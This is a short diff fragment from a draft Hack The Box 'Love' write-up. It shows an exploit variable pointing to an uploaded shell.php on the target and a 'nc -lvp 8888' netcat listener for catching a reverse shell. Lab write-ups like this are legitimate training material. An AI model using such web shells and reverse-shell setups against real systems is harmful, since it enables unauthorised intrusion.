tpetersonkth/tpetersonkth.github.io/_drafts/HTB-Love-Writeup.md

 CALL_SHELL = f"http://{IP}/images/shell.php"
 {% endhighlight %}

-Next, we execute "nc -lvp 8888" to start a listener on port 8888 and run the exploit.
+Next, we execute "nc -lvp 8888" to start a netcat listener on port 8888.
+Then, we run the exploit.

 {% highlight none linenos %}
 ┌──(kali㉿kali)-[/tmp/x]